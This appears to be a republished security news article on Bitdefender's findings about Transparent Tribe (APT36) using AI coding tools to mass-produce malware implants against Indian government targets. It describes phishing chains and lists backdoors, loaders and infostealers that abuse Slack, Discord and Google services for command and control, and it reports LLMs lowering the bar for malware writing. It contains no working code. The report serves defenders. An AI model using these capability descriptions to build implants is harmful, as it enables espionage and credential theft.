Pakistan-aligned threat actors known as Transparent Tribe have become the latest hacking group to utilize artificial intelligence (AI)-powered coding tools to attack targets with various implants.
According to new findings from Bitdefender, the campaign is designed to generate “a large number of mediocre implants” developed using lesser-known programming languages such as Nim, Zig, and Crystal, and relying on trusted services such as Slack, Discord, Supabase, and Google Sheets to remain unobtrusive.
In a technical breakdown of the campaign, security researchers Radu Tudrica, Adrian Schipor, Victor Vrabie, Marius Baciu, and Martin Zugec wrote, “Rather than a breakthrough in technological sophistication, we see a shift toward an AI-assisted malware industrialization that allows attackers to flood target environments with single-use, multilingual binaries.”
Romanian cybersecurity vendors are characterizing the move to vibe-coded malware (also known as vibeware) as distributed denial-of-detection (DDoD) as a way to complicate detection. Rather than using advanced techniques to circumvent detection efforts, this approach involves pumping a large number of single-use binaries into the target environment, each using a different language and communication protocol.
Large-scale language models (LLMs) assist threat actors in this aspect. LLM lowers the barrier to cybercrime and closes the expertise gap by allowing you to generate functional code in unfamiliar languages, either from scratch or by porting core business logic from more popular languages.
The latest round of attacks has been found to target the Indian government and its embassies in multiple foreign countries, with APT36 using LinkedIn to identify high-value targets. The attack also targeted the Afghan government and some private companies, to a lesser extent.
The infection chain can begin with a phishing email containing a Windows shortcut (LNK) bundled with a ZIP archive or ISO image. Alternatively, a PDF lure with a prominent “Download Document” button is used to redirect the user to an attacker-controlled website that triggers the download of the same ZIP archive.
Regardless of the method used, LNK files are used to execute PowerShell scripts in memory, which then download and execute the main backdoor to facilitate post-compromise actions. These include the introduction of known adversary simulation tools such as Cobalt Strike and Havoc, demonstrating a hybrid approach to ensuring resilience.
Here are some of the other tools observed as part of the attack:
Warcode is a custom shellcode loader written in Crystal that is used to reflexively load Havoc agents directly into memory. NimShellcodeLoader is an experimental counterpart used to deploy Cobalt Strike beacons embedded in Warcode. CreepDropper is a .NET malware used to deliver and install additional payloads, including SHEETCREEP, a Go-based infostealer that uses Microsoft Graph API for C2, and MAILCREEP, a C#-based backdoor that leverages Google Sheets for C2. Both malware families were detailed by Zscaler ThreatLabz in January 2026. SupaServ is a Rust-based backdoor that establishes the primary communication channel through the Supabase platform, with Firebase acting as a fallback. It contains Unicode emojis, suggesting it was likely developed using AI. LuminousStealer is a supposedly vibe-coded Rust-based infostealer that uses Firebase and Google Drive to extract files matching specific extensions (.txt, .docx, .pdf, .png, .jpg, .xlsx, .pptx, .zip, .rar, .doc, and .xls). CrystalShell is a backdoor written in Crystal that can target Windows, Linux, and macOS systems and uses a hardcoded Discord channel ID for the C2. Supports the ability to execute commands and collect host information. One variant of this malware was found to use Slack for its C2. ZigShell is the equivalent of CrystalShell, written in Zig and uses Slack as its primary C2 infrastructure. It also supports additional functionality to upload and download files. CrystalFile is a simple command interpreter written in Crystal that continuously monitors ‘C:\Users\Public\AccountPictures\input.txt’ and executes its contents using ‘cmd.exe’. LuminousCookies is a specialized Rust-based injector that extracts cookies, passwords, and payment information from Chromium-based browsers by bypassing app-bound encryption. BackupSpy is a Rust-based utility designed to monitor high-value data on local file systems and external media. ZigLoader is a specialized loader written in Zig that decrypts and executes arbitrary shellcode in memory. Gate Sentinel Beacon is a customized version of the open source GateSentinel C2 framework project.
“APT36’s move to Vibeware represents a technological regression,” Bitdefender said. “Although AI-assisted development increases sample volumes, the resulting tools are often unstable and full of logic errors. Attacker strategies have incorrectly targeted signature-based detection, which has long been supplanted by modern endpoint security.”
Bitdefender warned that the threat posed by AI-assisted malware is the industrialization of attacks, allowing threat actors to scale up their operations quickly and with less effort.
“We are witnessing the convergence of two trends that have been developing for some time: the adoption of exotic and niche programming languages, and the exploitation of trusted services to hide behind legitimate network traffic,” the researchers said. “This combination allows even mediocre code to achieve high operational success by overwhelming standard defensive telemetry.”
Source link
